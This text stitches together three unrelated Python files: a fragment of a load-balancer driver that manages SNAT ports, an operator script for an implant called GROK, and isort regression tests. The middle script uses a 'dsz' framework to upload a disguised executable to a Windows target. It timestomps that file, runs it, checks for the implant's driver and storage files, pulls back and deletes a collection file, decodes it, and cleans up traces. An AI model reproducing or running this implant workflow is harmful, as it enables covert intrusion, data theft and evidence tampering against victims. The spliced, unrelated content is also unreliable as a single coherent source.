ports = self.plugin._core_plugin.get_ports(context, filters=filter)
if ports:
LOG.info(_("Found an existing SNAT port for subnet %s" % subnet_id))
return ports[0]
LOG.info(_("Found no SNAT ports for subnet %s" % subnet_id))
return None
def _create_snatport_for_subnet(self, context, tenant_id, subnet_id, ip_address):
subnet = self.plugin._core_plugin.get_subnet(context, subnet_id)
fixed_ip = {'subnet_id': subnet['id']}
if ip_address and ip_address != attributes.ATTR_NOT_SPECIFIED:
fixed_ip['ip_address'] = ip_address
port_data = {
'tenant_id': tenant_id,
'name': '_lb-snatport-' + subnet_id,
'network_id': subnet['network_id'],
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': False,
'device_id': '',
'device_owner': '',
'fixed_ips': [fixed_ip]
}
port = self.plugin._core_plugin.create_port(context, {'port': port_data})
return port
def _remove_snatport_for_subnet(self, context, tenant_id, subnet_id):
port = self._get_snatport_for_subnet(context,tenant_id, subnet_id)
if port:
self.plugin._core_plugin.delete_port(context, port['id'])
def _create_snatport_for_subnet_if_not_exists(self, context, tenant_id, subnet_id, network_info):
port = self._get_snatport_for_subnet(context, tenant_id, subnet_id)
if not port:
LOG.info(_("No SNAT port exists yet for subnet %s. Creating one..." % subnet_id))
port = self._create_snatport_for_subnet(context, tenant_id, subnet_id, ip_address=None)
network_info['port_id'] = port['id']
network_info['snat_ip'] = port['fixed_ips'][0]['ip_address']
LOG.info(_("SNAT port: %s" % repr(port)))
def _remove_snatport_for_subnet_if_not_used(self, context, tenant_id, subnet_id):
pools = self._get_pools_on_subnet(context, tenant_id, subnet_id)
if not pools:
#No pools left on the old subnet. We can remove the SNAT port/ipaddress
self._remove_snatport_for_subnet(context, tenant_id, subnet_id)
LOG.info(_("Removing SNAT port for subnet %s as it is the last pool using it..." % subnet_id))
def get_pool_agent(self, context, pool_id):
agent = self.plugin.get_lbaas_agent_hosting_pool(context, pool_id)
if not agent:
raise lbaas_agentscheduler.NoActiveLbaasAgent(pool_id=pool_id)
return agent['agent']
def create_vip(self, context, vip):
agent = self.get_pool_agent(context, vip['pool_id'])
network_info = self._get_vip_network_info(context, vip)
self.agent_rpc.create_vip(context, vip, network_info, agent['host'])
LOG.info(_('create_vip rpc sent to loadbalancer agent...'))
def update_vip(self, context, old_vip, vip):
agent = self.get_pool_agent(context, vip['pool_id'])
old_network_info = self._get_vip_network_info(context, old_vip)
network_info = self._get_vip_network_info(context, vip)
self.agent_rpc.update_vip(context, old_vip, vip, old_network_info, network_info, agent['host'])
LOG.info(_('update_vip rpc sent to loadbalancer agent...'))
def delete_vip(self, context, vip):
agent = self.get_pool_agent(context, vip['pool_id'])
network_info = self._get_vip_network_info(context, vip)
self.agent_rpc.delete_vip(context, vip, network_info, agent['host'])
LOG.info(_('delete_vip rpc sent to loadbalancer agent...'))
self.plugin._delete_db_vip(context, vip['id'])
def create_pool(self, context, pool):
LOG.info(_("Pool to be created: %s" % repr(pool)))
#This is where we pick an agent for this pool (and related resources)
agent = self.pool_scheduler.schedule(self.plugin, context, pool)
if not agent:
raise lbaas_agentscheduler.NoEligibleLbaasAgent(pool_id=pool['id'])
network_info = self._get_pool_network_info(context, pool)
#allocate a snat port/ipaddress on the subnet if one doesn't exist
port = self._create_snatport_for_subnet_if_not_exists(context, pool['tenant_id'], pool['subnet_id'], network_info)
self.agent_rpc.create_pool(context, pool, network_info, agent['host'])
LOG.info(_('create_pool rpc sent to loadbalancer agent...'))
def update_pool(self, context, old_pool, pool):
agent = self.get_pool_agent(context, pool['id'])
old_network_info = self._get_pool_network_info(context, old_pool)
network_info = self._get_pool_network_info(context, pool)
if pool['subnet_id'] != old_pool['subnet_id']:
# if this is the first pool using the new subnet, then add a snat port/ipaddress to it.
self._create_snatport_for_subnet_if_not_exists(context, pool['tenant_id'], pool['subnet_id'], network_info)
#remove the old snat port/ipaddress from old subnet if this was the last pool using it
self._remove_snatport_for_subnet_if_not_used(context, old_pool['tenant_id'], old_pool['subnet_id'])
self.agent_rpc.update_pool(context, old_pool, pool, old_network_info, network_info, agent['host'])
LOG.info(_('update_pool rpc sent to loadbalancer agent...'))
def delete_pool(self, context, pool):
LOG.info(_("Pool to be deleted: %s" % repr(pool)))
agent = self.get_pool_agent(context, pool['id'])
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.delete_pool(context, pool, network_info, agent['host'])
LOG.info(_('delete_pool rpc sent to loadbalancer agent...'))
self.plugin._delete_db_pool(context, pool['id'])
self._remove_snatport_for_subnet_if_not_used(context, pool['tenant_id'], pool['subnet_id'])
def create_member(self, context, member):
agent = self.get_pool_agent(context, member['pool_id'])
pool = self.plugin.get_pool(context, member['pool_id'])
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.create_member(context, member, network_info, agent['host'])
LOG.info(_('create_member rpc sent to loadbalancer agent...'))
def update_member(self, context, old_member, member):
agent = self.get_pool_agent(context, member['pool_id'])
old_pool = self.plugin.get_pool(context, old_member['pool_id'])
pool = self.plugin.get_pool(context, member['pool_id'])
old_network_info = self._get_pool_network_info(context, old_pool)
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.update_member(context, old_member, member, old_network_info, network_info, agent['host'])
LOG.info(_('update_member rpc sent to loadbalancer agent...'))
def delete_member(self, context, member):
agent = self.get_pool_agent(context, member['pool_id'])
pool = self.plugin.get_pool(context, member['pool_id'])
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.delete_member(context, member, network_info, agent['host'])
LOG.info(_('delete_member rpc sent to loadbalancer agent...'))
self.plugin._delete_db_member(context, member['id'])
def create_pool_health_monitor(self, context, health_monitor, pool_id):
LOG.info(_("about to create health monitor..."))
agent = self.get_pool_agent(context, pool_id)
pool = self.plugin.get_pool(context, pool_id)
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.create_pool_health_monitor(context, health_monitor, pool_id, network_info, agent['host'])
LOG.info(_('create_pool_health_monitor rpc sent to loadbalancer agent...'))
def update_health_monitor(self, context, old_health_monitor,
health_monitor, pool_id):
agent = self.get_pool_agent(context, pool_id)
pool = self.plugin.get_pool(context, pool_id)
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.update_health_monitor(context, old_health_monitor,
health_monitor, pool_id, network_info, agent['host'])
LOG.info(_('update_health_monitor rpc sent to loadbalancer agent...'))
def delete_pool_health_monitor(self, context, health_monitor, pool_id):
agent = self.get_pool_agent(context, pool_id)
pool = self.plugin.get_pool(context, pool_id)
network_info = self._get_pool_network_info(context, pool)
self.agent_rpc.delete_pool_health_monitor(context, health_monitor, pool_id,
network_info, agent['host'])
LOG.info(_('delete_health_monitor rpc sent to loadbalancer agent...'))
self.plugin._delete_db_pool_health_monitor(context, health_monitor['id'], pool_id)
def stats(self, context, pool_id):
pass
| |
import dsz.lp
import dsz.version
import dsz.ui
import dsz.path
import dsz.file
import dsz.control
import dsz.menu
import dsz.env
tool = 'Grok'
version = '1.2.0.1'
fileName = 'help16.exe'
resDir = dsz.lp.GetResourcesDirectory()
logdir = dsz.lp.GetLogsDirectory()
GROK_PATH = ('%s\\%s\\%s' % (resDir, tool, version))
def grokverify(input):
storageSuccessFlag = True
driverSuccessFlag = True
success = True
if dsz.file.Exists('tm154d.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154d.da dump file exists ... this should not be here', dsz.ERROR)
if dsz.file.Exists('tm154p.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154p.da overflow file exists ... log may be full', dsz.ERROR)
if dsz.file.Exists('tm154_.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154_.da config file exists ... ', dsz.GOOD)
if dsz.file.Exists('tm154o.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154o.da storage file exists ... SUCCESSFUL', dsz.GOOD)
else:
dsz.ui.Echo('tm154o.da storage file missing ... FAILED', dsz.ERROR)
storageSuccessFlag = False
if dsz.file.Exists('msrtdv.sys', ('%s\\drivers' % systemPath)):
dsz.ui.Echo('msrtdv.sys driver exists ... SUCCESSFUL', dsz.GOOD)
else:
dsz.ui.Echo('msrtdv.sys driver missing ... FAILED', dsz.ERROR)
driverSuccessFlag = False
if ((driverSuccessFlag == True) and (storageSuccessFlag == True)):
dsz.ui.Echo('GROK properly installed on target', dsz.GOOD)
elif (((driverSuccessFlag == False) and (storageSuccessFlag == True)) or ((driverSuccessFlag == True) and (storageSuccessFlag == False))):
dsz.ui.Echo('GROK is in a bad state', dsz.WARNING)
success = False
else:
dsz.ui.Echo("GROK doesn't exist on target!", dsz.ERROR)
success = False
return success
def putfile(localfile, remotefile):
dsz.ui.Echo(('Putting %s on target as %s' % (localfile, remotefile)))
cmd = ('put %s -name %s' % (localfile, remotefile))
dsz.control.echo.Off()
global putid
(runsuccess, putid) = dsz.cmd.RunEx(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not put %s on target as %s' % (localfile, remotefile)), dsz.ERROR)
return False
dsz.ui.Echo(('Successfully put %s on target as %s' % (localfile, remotefile)))
cmd = ('matchfiletimes -src %s\\help.exe -dst %s' % (systemPath, remotefile))
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile)), dsz.ERROR)
dsz.ui.Echo('Make sure to manually delete it!!!', dsz.ERROR)
return False
dsz.ui.Echo(('Matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile)))
return True
def runfile(remotefile):
dsz.ui.Echo(('Running %s' % remotefile))
cmd = ('run -command "%s"' % remotefile)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Running %s failed!!!' % remotefile), dsz.ERROR)
dsz.ui.Echo('Make sure to manually clean!!!', dsz.ERROR)
return False
return True
def collectfiles(temppath):
dsz.ui.Echo(('Getting collection file, %s\\Tprf3~' % temppath))
cmd = ('get %s\\Tprf3~' % temppath)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not get collection file, %s\\Tprf3~' % temppath), dsz.ERROR)
return False
getfilename = dsz.cmd.data.Get('FileLocalName::localname', dsz.TYPE_STRING)[0]
dsz.ui.Echo(('Deleting collection file, %s\\Tprf3~' % temppath))
cmd = ('delete %s\\Tprf3~' % temppath)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not delete collection file, %s\\Tprf3~' % temppath), dsz.ERROR)
return False
dsz.ui.Echo('Moving file to NOSEND directory...')
dsz.control.echo.Off()
dsz.cmd.Run(('local mkdir %s\\GetFiles\\NOSEND' % logdir))
dsz.cmd.Run(('local mkdir %s\\GetFiles\\Grok_Decrypted' % logdir))
cmd = ('local move %s\\GetFiles\\%s %s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename, logdir, getfilename))
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
success = parsefile(('%s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename)))
if (not success):
return False
return True
def parsefile(file):
(path, filename) = dsz.path.Split(file)
cmd = ('local run -command "%s\\Offline\\GkDecoder.exe %s %s\\GetFiles\\Grok_Decrypted\\%s.xml"' % (GROK_PATH, file, logdir, filename))
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo('There was an error parsing the collection', dsz.ERROR)
return False
return True
def grokparse(input):
fullpath = dsz.ui.GetString('Please enter the full path to the file you want parse: ', '')
if (fullpath == ''):
dsz.ui.Echo('No string entered', dsz.ERROR)
return False
success = parsefile(fullpath)
if (not success):
return False
return True
def sleepwait():
while True:
dsz.ui.Echo('Sleeping 5s to see if exe self deletes')
dsz.Sleep(5000)
if (not dsz.file.Exists(fileName, systemPath)):
dsz.ui.Echo('Executeable self deleted, good to go')
return True
else:
dsz.ui.Echo('Executeable did not self delete', dsz.ERROR)
def cdtotemp():
dsz.control.echo.Off()
cmd = 'pwd'
dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
curpath = dsz.cmd.data.Get('CurrentDirectory::path', dsz.TYPE_STRING)[0]
temppath = ('%s\\..\\temp' % systemPath)
cmd = ('cd %s' % temppath)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
return (temppath, curpath)
def cdreturn(curpath):
dsz.control.echo.Off()
cmd = ('cd %s' % curpath)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
return True
def grokinstall(input):
success = putfile(('%s\\Uploads\\msgki.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
success = runfile(('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
sleepwait()
return True
def grokcollect(input):
success = putfile(('%s\\Uploads\\msgkd.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
(temppath, curpath) = cdtotemp()
success = runfile(('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
sleepwait()
cdreturn(curpath)
success = collectfiles(temppath)
if (not success):
return False
return True
def grokuninstall(input):
success = putfile(('%s\\Uploads\\msgku.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
(temppath, curpath) = cdtotemp()
success = runfile(('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
sleepwait()
cdreturn(curpath)
success = collectfiles(temppath)
if (not success):
return False
if dsz.file.Exists('tm154*.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154*.da files exist, deleting')
cmd = ('delete -mask tm154*.da -path %s\\..\\temp' % systemPath)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo('Failed to delete tm154*.da', dsz.ERROR)
return True
def changename(input):
global fileName
fileName = dsz.ui.GetString('New upload name for GROK:', 'help16.exe')
dsz.ui.Echo(('*** Upload name now set to %s ***' % fileName), dsz.WARNING)
def main():
menuOption = 0
if (not dsz.version.checks.IsWindows()):
dsz.ui.Echo('GROK requires a Windows OS', dsz.ERROR)
return 0
if dsz.version.checks.IsOs64Bit():
dsz.ui.Echo(('GROK %s requires x86' % version), dsz.ERROR)
return 0
if dsz.path.windows.GetSystemPath():
global systemPath
systemPath = dsz.path.windows.GetSystemPath()
else:
dsz.ui.Echo('Could not find system path', dsz.ERROR)
return 0
menu_list = list()
menu_list.append({dsz.menu.Name: 'Install', dsz.menu.Function: grokinstall})
menu_list.append({dsz.menu.Name: 'Uninstall', dsz.menu.Function: grokuninstall})
menu_list.append({dsz.menu.Name: 'Verify Install', dsz.menu.Function: grokverify})
menu_list.append({dsz.menu.Name: 'Collect and Parse', dsz.menu.Function: grokcollect})
menu_list.append({dsz.menu.Name: 'Parse Local', dsz.menu.Function: grokparse})
menu_list.append({dsz.menu.Name: 'Change Upload Name', dsz.menu.Function: changename})
while (menuOption != (-1)):
(retvalue, menuOption) = dsz.menu.ExecuteSimpleMenu(('\n\n========================\nGrok %s Menu\n========================\nUpload Name: %s\n' % (version, fileName)), menu_list)
if (menuOption == 0):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'DEPLOYED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'DEPLOYED', 'Unsuccessful')
dsz.control.echo.Off()
cmd = ('stop %s' % putid)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
elif (menuOption == 1):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'DELETED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'DELETED', 'Unsuccessful')
dsz.control.echo.Off()
cmd = ('stop %s' % putid)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
elif (menuOption == 2):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Unsuccessful')
elif (menuOption == 3):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Unsuccessful')
dsz.control.echo.Off()
cmd = ('stop %s' % putid)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
elif (menuOption == 4):
pass
dsz.ui.Echo('***************************')
dsz.ui.Echo('* GROK script completed. *')
dsz.ui.Echo('***************************')
return 0
if (__name__ == '__main__'):
main()
| |
"""A growing set of tests designed to ensure isort doesn't have regressions in new versions"""
from io import StringIO
import pytest
import isort
def test_isort_duplicating_comments_issue_1264():
"""Ensure isort doesn't duplicate comments when force_sort_within_sections is set to `True`
as was the case in issue #1264: https://github.com/pycqa/isort/issues/1264
"""
assert (
isort.code(
"""
from homeassistant.util.logging import catch_log_exception
# Loading the config flow...
from . import config_flow
""",
force_sort_within_sections=True,
).count("# Loading the config flow...")
== 1
)
def test_moving_comments_issue_726():
test_input = (
"from Blue import models as BlueModels\n"
"# comment for PlaidModel\n"
"from Plaid.models import PlaidModel\n"
)
assert isort.code(test_input, force_sort_within_sections=True) == test_input
test_input = (
"# comment for BlueModels\n"
"from Blue import models as BlueModels\n"
"# comment for PlaidModel\n"
"# another comment for PlaidModel\n"
"from Plaid.models import PlaidModel\n"
)
assert isort.code(test_input, force_sort_within_sections=True) == test_input
def test_blank_lined_removed_issue_1275():
"""Ensure isort doesn't accidentally remove blank lines after doc strings and before imports.
See: https://github.com/pycqa/isort/issues/1275
"""
assert (
isort.code(
'''"""
My docstring
"""
from b import thing
from a import other_thing
'''
)
== '''"""
My docstring
"""
from a import other_thing
from b import thing
'''
)
assert (
isort.code(
'''"""
My docstring
"""
from b import thing
from a import other_thing
''',
add_imports=["from b import thing"],
)
== '''"""
My docstring
"""
from a import other_thing
from b import thing
'''
)
def test_blank_lined_removed_issue_1283():
"""Ensure isort doesn't accidentally remove blank lines after __version__ identifiers.
See: https://github.com/pycqa/isort/issues/1283
"""
test_input = """__version__ = "0.58.1"
from starlette import status
"""
assert isort.code(test_input) == test_input
def test_extra_blank_line_added_nested_imports_issue_1290():
"""Ensure isort doesn't add unnecessary blank lines above nested imports.
See: https://github.com/pycqa/isort/issues/1290
"""
test_input = '''from typing import TYPE_CHECKING
# Special imports
from special import thing
if TYPE_CHECKING:
# Special imports
from special import another_thing
def func():
"""Docstring"""
# Special imports
from special import something_else
return
'''
assert (
isort.code(
test_input,
import_heading_special="Special imports",
known_special=["special"],
sections=["FUTURE", "STDLIB", "THIRDPARTY", "SPECIAL", "FIRSTPARTY", "LOCALFOLDER"],
)
== test_input
)
def test_add_imports_shouldnt_make_isort_unusable_issue_1297():
"""Test to ensure add imports doesn't cause any unexpected behaviour when combined with check
See: https://github.com/pycqa/isort/issues/1297
"""
assert isort.check_code(
"""from __future__ import unicode_literals
from os import path
""",
add_imports={"from __future__ import unicode_literals"},
)
def test_no_extra_lines_for_imports_in_functions_issue_1277():
"""Test to ensure isort doesn't introduce extra blank lines for imports within function.
See: https://github.com/pycqa/isort/issues/1277
"""
test_input = """
def main():
import time
import sys
"""
expected_output = """
def main():
import sys
import time
"""
assert isort.code(isort.code(isort.code(test_input))) == expected_output
def test_no_extra_blank_lines_in_methods_issue_1293():
"""Test to ensure isort isn't introducing extra lines in methods that contain imports
See: https://github.com/pycqa/isort/issues/1293
"""
test_input = """
class Something(object):
def on_email_deleted(self, email):
from hyperkitty.tasks import rebuild_thread_cache_new_email
# update or cleanup thread # noqa: E303 (isort issue)
if self.emails.count() == 0:
...
"""
assert isort.code(test_input) == test_input
assert isort.code(test_input, lines_after_imports=2) == test_input
def test_force_single_line_shouldnt_remove_preceding_comment_lines_issue_1296():
"""Tests to ensure force_single_line setting doesn't result in lost comments.
See: https://github.com/pycqa/isort/issues/1296
"""
test_input = """
# A comment
# A comment
# Oh no, I'm gone
from moo import foo
"""
# assert isort.code(test_input) == test_input
assert isort.code(test_input, force_single_line=True) == test_input
def test_ensure_new_line_before_comments_mixed_with_ensure_newline_before_comments_1295():
"""Tests to ensure that the black profile can be used in conjunction with
force_sort_within_sections.
See: https://github.com/pycqa/isort/issues/1295
"""
test_input = """
from openzwave.group import ZWaveGroup
from openzwave.network import ZWaveNetwork
# pylint: disable=import-error
from openzwave.option import ZWaveOption
"""
assert isort.code(test_input, profile="black") == test_input
assert isort.code(test_input, profile="black", force_sort_within_sections=True) == test_input
def test_trailing_comma_doesnt_introduce_broken_code_with_comment_and_wrap_issue_1302():
"""Tests to assert the combination of include_trailing_comma and a wrapped line doesnt break.
See: https://github.com/pycqa/isort/issues/1302.
"""
assert (
isort.code(
"""
from somewhere import very_very_very_very_very_very_long_symbol # some comment
""",
line_length=50,
include_trailing_comma=True,
)
== """
from somewhere import \\
very_very_very_very_very_very_long_symbol # some comment
"""
)
def test_ensure_sre_parse_is_identified_as_stdlib_issue_1304():
"""Ensure sre_parse is idenified as STDLIB.
See: https://github.com/pycqa/isort/issues/1304.
"""
assert (
isort.place_module("sre_parse") == isort.place_module("sre") == isort.settings.STDLIB # type: ignore # noqa
)
def test_add_imports_shouldnt_move_lower_comments_issue_1300():
"""Ensure add_imports doesn't move comments immediately below imports.
See:: https://github.com/pycqa/isort/issues/1300.
"""
test_input = """from __future__ import unicode_literals
from os import path
# A comment for a constant
ANSWER = 42
"""
assert isort.code(test_input, add_imports=["from os import path"]) == test_input
def test_windows_newline_issue_1277():
"""Test to ensure windows new lines are correctly handled within indented scopes.
See: https://github.com/pycqa/isort/issues/1277
"""
assert (
isort.code("\ndef main():\r\n import time\r\n\n import sys\r\n")
== "\ndef main():\r\n import sys\r\n import time\r\n"
)
def test_windows_newline_issue_1278():
"""Test to ensure windows new lines are correctly handled within indented scopes.
See: https://github.com/pycqa/isort/issues/1278
"""
assert isort.check_code(
"\ntry:\r\n import datadog_agent\r\n\r\n "
"from ..log import CheckLoggingAdapter, init_logging\r\n\r\n init_logging()\r\n"
"except ImportError:\r\n pass\r\n"
)
def test_check_never_passes_with_indented_headings_issue_1301():
"""Test to ensure that test can pass even when there are indented headings.
See: https://github.com/pycqa/isort/issues/1301
"""
assert isort.check_code(
"""
try:
# stdlib
import logging
from os import abc, path
except ImportError:
pass
""",
import_heading_stdlib="stdlib",
)
def test_isort_shouldnt_fail_on_long_from_with_dot_issue_1190():
"""Test to ensure that isort will correctly handle formatting a long from import that contains
a dot.
See: https://github.com/pycqa/isort/issues/1190
"""
assert (
isort.code(
"""
from this_is_a_very_long_import_statement.that_will_occur_across_two_lines\\
.when_the_line_length.is_only_seventynine_chars import (
function1,
function2,
)
""",
line_length=79,
multi_line_output=3,
)
== """
from this_is_a_very_long_import_statement.that_will_occur_across_two_lines"""
""".when_the_line_length.is_only_seventynine_chars import (
function1,
function2
)
"""
)
def test_isort_shouldnt_add_extra_new_line_when_fass_and_n_issue_1315():
"""Test to ensure isort doesnt add a second extra new line when combining --fss and -n options.
See: https://github.com/pycqa/isort/issues/1315
"""
assert isort.check_code(
"""import sys
# Comment canary
from . import foo
""",
ensure_newline_before_comments=True, # -n
force_sort_within_sections=True, # -fss
show_diff=True, # for better debugging in the case the test case fails.
)
assert (
isort.code(
"""
from . import foo
# Comment canary
from .. import foo
""",
ensure_newline_before_comments=True,
force_sort_within_sections=True,
)
== """
from . import foo
# Comment canary
from .. import foo
"""
)
def test_isort_doesnt_rewrite_import_with_dot_to_from_import_issue_1280():
"""Test to ensure isort doesn't rewrite imports in the from of import y.x into from y import x.
This is because they are not technically fully equivalent to eachother and can introduce broken
behaviour.
See: https://github.com/pycqa/isort/issues/1280
"""
assert isort.check_code(
"""
import test.module
import test.module as m
from test import module
from test import module as m
""",
show_diff=True,
)
def test_isort_shouldnt_introduce_extra_lines_with_fass_issue_1322():
"""Tests to ensure isort doesn't introduce extra lines when used with fass option.
See: https://github.com/pycqa/isort/issues/1322
"""
assert (
isort.code(
"""
import logging
# Comment canary
from foo import bar
import quux
""",
force_sort_within_sections=True,
ensure_newline_before_comments=True,
)
== """
import logging
# Comment canary
from foo import bar
import quux
"""
)
def test_comments_should_cause_wrapping_on_long_lines_black_mode_issue_1219():
"""Tests to ensure if isort encounters a single import line which is made too long with a comment
it is wrapped when using black profile.
See: https://github.com/pycqa/isort/issues/1219
"""
assert isort.check_code(
"""
from many_stop_words import (
get_stop_words as get_base_stopwords, # extended list of stop words, also for en
)
""",
show_diff=True,
profile="black",
)
def test_comment_blocks_should_stay_associated_without_extra_lines_issue_1156():
"""Tests to ensure isort doesn't add an extra line when there are large import blocks
or otherwise warp the intent.
See: https://github.com/pycqa/isort/issues/1156
"""
assert (
isort.code(
"""from top_level_ignored import config # isort:skip
####################################
# COMMENT BLOCK SEPARATING THESE #
####################################
from ast import excepthandler
import logging
"""
)
== """from top_level_ignored import config # isort:skip
import logging
####################################
# COMMENT BLOCK SEPARATING THESE #
####################################
from ast import excepthandler
"""
)
def test_comment_shouldnt_be_duplicated_with_fass_enabled_issue_1329():
"""Tests to ensure isort doesn't duplicate comments when imports occur with comment on top,
immediately after large comment blocks.
See: https://github.com/pycqa/isort/pull/1329/files.
"""
assert isort.check_code(
"""'''
Multi-line docstring
'''
# Comment for A.
import a
# Comment for B - not A!
import b
""",
force_sort_within_sections=True,
show_diff=True,
)
def test_wrap_mode_equal_to_line_length_with_indendet_imports_issue_1333():
assert isort.check_code(
"""
import a
import b
def function():
import a as b
import c as d
""",
line_length=17,
wrap_length=17,
show_diff=True,
)
def test_isort_skipped_nested_imports_issue_1339():
"""Ensure `isort:skip are honored in nested imports.
See: https://github.com/pycqa/isort/issues/1339.
"""
assert isort.check_code(
"""
def import_test():
from os ( # isort:skip
import path
)
""",
show_diff=True,
)
def test_windows_diff_too_large_misrepresentative_issue_1348(test_path):
"""Ensure isort handles windows files correctly when it come to producing a diff with --diff.
See: https://github.com/pycqa/isort/issues/1348
"""
diff_output = StringIO()
isort.file(test_path / "example_crlf_file.py", show_diff=diff_output)
diff_output.seek(0)
assert diff_output.read().endswith(
"-1,5 +1,5 @@\n+import a\r\n import b\r\n" "-import a\r\n \r\n \r\n def func():\r\n"
)
def test_combine_as_does_not_lose_comments_issue_1321():
"""Test to ensure isort doesn't lose comments when --combine-as is used.
See: https://github.com/pycqa/isort/issues/1321
"""
test_input = """
from foo import * # noqa
from foo import bar as quux # other
from foo import x as a # noqa
import operator as op # op comment
import datetime as dtime # dtime comment
from datetime import date as d # dcomm
from datetime import datetime as dt # dtcomm
"""
expected_output = """
import datetime as dtime # dtime comment
import operator as op # op comment
from datetime import date as d, datetime as dt # dcomm; dtcomm
from foo import * # noqa
from foo import bar as quux, x as a # other; noqa
"""
assert isort.code(test_input, combine_as_imports=True) == expected_output
def test_combine_as_does_not_lose_comments_issue_1381():
"""Test to ensure isort doesn't lose comments when --combine-as is used.
See: https://github.com/pycqa/isort/issues/1381
"""
test_input = """
from smtplib import SMTPConnectError, SMTPNotSupportedError # important comment
"""
assert "# important comment" in isort.code(test_input, combine_as_imports=True)
test_input = """
from appsettings import AppSettings, ObjectSetting, StringSetting # type: ignore
"""
assert "# type: ignore" in isort.code(test_input, combine_as_imports=True)
def test_incorrect_grouping_when_comments_issue_1396():
"""Test to ensure isort groups import correct independent of the comments present.
See: https://github.com/pycqa/isort/issues/1396
"""
assert (
isort.code(
"""from django.shortcuts import render
from apps.profiler.models import Project
from django.contrib.auth.decorators import login_required
from django.views.generic import (
# ListView,
# DetailView,
TemplateView,
# CreateView,
# View
)
""",
line_length=88,
known_first_party=["apps"],
known_django=["django"],
sections=["FUTURE", "STDLIB", "DJANGO", "THIRDPARTY", "FIRSTPARTY", "LOCALFOLDER"],
)
== """from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.views.generic import \\
TemplateView # ListView,; DetailView,; CreateView,; View
from apps.profiler.models import Project
"""
)
assert (
isort.code(
"""from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from apps.profiler.models import Project
from django.views.generic import ( # ListView,; DetailView,; CreateView,; View
TemplateView,
)
""",
line_length=88,
known_first_party=["apps"],
known_django=["django"],
sections=["FUTURE", "STDLIB", "DJANGO", "THIRDPARTY", "FIRSTPARTY", "LOCALFOLDER"],
include_trailing_comma=True,
multi_line_output=3,
force_grid_wrap=0,
use_parentheses=True,
ensure_newline_before_comments=True,
)
== """from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.views.generic import ( # ListView,; DetailView,; CreateView,; View
TemplateView,
)
from apps.profiler.models import Project
"""
)
def test_reverse_relative_combined_with_force_sort_within_sections_issue_1395():
"""Test to ensure reverse relative combines well with other common isort settings.
See: https://github.com/pycqa/isort/issues/1395.
"""
assert isort.check_code(
"""from .fileA import a_var
from ..fileB import b_var
""",
show_diff=True,
reverse_relative=True,
force_sort_within_sections=True,
order_by_type=False,
case_sensitive=False,
multi_line_output=5,
sections=["FUTURE", "STDLIB", "THIRDPARTY", "FIRSTPARTY", "APPLICATION", "LOCALFOLDER"],
lines_after_imports=2,
no_lines_before="LOCALFOLDER",
)
def test_isort_should_be_able_to_add_independent_of_doc_string_placement_issue_1420():
"""isort should be able to know when an import requested to be added is sucesfully added,
independent of where the top doc string is located.
See: https://github.com/PyCQA/isort/issues/1420
"""
assert isort.check_code(
'''"""module docstring"""
import os
''',
show_diff=True,
add_imports=["os"],
)
def test_comments_should_never_be_moved_between_imports_issue_1427():
"""isort should never move comments to different import statement.
See: https://github.com/PyCQA/isort/issues/1427
"""
assert isort.check_code(
"""from package import CONSTANT
from package import * # noqa
""",
force_single_line=True,
